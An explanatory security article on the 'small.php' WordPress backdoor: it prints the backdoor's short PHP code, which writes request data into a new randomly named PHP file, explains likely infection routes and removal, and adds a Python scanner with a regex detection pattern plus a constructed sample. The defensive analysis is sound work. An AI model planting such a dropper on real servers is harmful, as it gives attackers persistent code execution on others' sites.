This article explains small.php, a piece of malware that has been spreading recently.

small.php is created in various folders on the WordPress server

This malware creates backdoor files named small.php in arbitrary folders on the server. The file may also be created in folders above the public html folder where the WordPress site data is located.

The example code is very simple:

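// 'random character' is a placeholder for a random string chosen by the attacker
$f = fopen('random character' . '.php', "w");   // create <random string>.php
fputs($f, $_REQUEST['random character']);        // write the request parameter's content into it
fclose($f);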

This is a type of malware called a backdoor: it takes a program sent over the Internet and stores it on the server as a file with a random string name.

How did small.php get onto the server?

The fact that this file was generated on the server means that the site was most likely hacked through a vulnerable WordPress plugin, or that the file was written by someone who had taken over administrative privileges, or written via other backdoors.

How to deal with small.php

In general, WordPress does not include a file named small.php.
Therefore, if you find a small.php file somewhere in your WordPress folder, you should suspect malware.

There have been cases where many of these files were written to folders above the WordPress folder. A file there cannot even be accessed externally, so if it is malware, we recommend that you delete it immediately.

You can also use Free WordPress:Malware Scan & Security Plug-in [Malware and Virus Detection and Removal] to detect and remove small.php malware.
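One way to look for these files by hand, as an added example that is not part of the original article: the script walks a directory tree (start it one level above the site folder so parent folders are covered) and reports files named small.php as well as PHP files that write request input to a file, as the sample above does. The names scan, demo and WRITE_REQUEST, the constructed folder layout, and the extension of the pattern to fwrite and $_POST/$_GET/$_COOKIE are assumptions of this example.

```python
import os
import re
import sys
import tempfile

# Heuristic (assumption): request input passed directly to fputs()/fwrite(),
# as in the sample above. fwrite and $_POST/$_GET/$_COOKIE are generalizations.
WRITE_REQUEST = re.compile(
    rb"\b(?:fputs|fwrite)\s*\(\s*\$\w+\s*,\s*\$_(?:REQUEST|POST|GET|COOKIE)\b",
    re.IGNORECASE,
)
MAX_BYTES = 1_000_000  # read at most 1 MB per file


def scan(root):
    """Return sorted (path, reason) findings for PHP files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            if name.lower() == "small.php":
                findings.append((path, "named small.php"))
            try:
                with open(path, "rb") as fh:
                    data = fh.read(MAX_BYTES)
            except OSError:
                continue  # unreadable file: skip it
            if WRITE_REQUEST.search(data):
                findings.append((path, "writes request input to a file"))
    return sorted(findings)


def demo():
    """Run scan() on a constructed tree: one dropper above the web root, one harmless file."""
    with tempfile.TemporaryDirectory() as top:
        site = os.path.join(top, "public_html", "wp-content", "uploads")
        os.makedirs(site)
        with open(os.path.join(top, "small.php"), "w") as fh:  # constructed sample
            fh.write("<?php $f = fopen('x.php', 'w'); fputs($f, $_REQUEST['k']); fclose($f);")
        with open(os.path.join(site, "index.php"), "w") as fh:
            fh.write("<?php // Silence is golden.")
        return [(os.path.relpath(p, top), why) for p, why in scan(top)]


if __name__ == "__main__":
    for path, why in scan(sys.argv[1]) if len(sys.argv) > 1 else demo():
        print(f"{path}: {why}")
```

A content match on a file with another name is a lead for manual review, since legitimate code can also write request data to files.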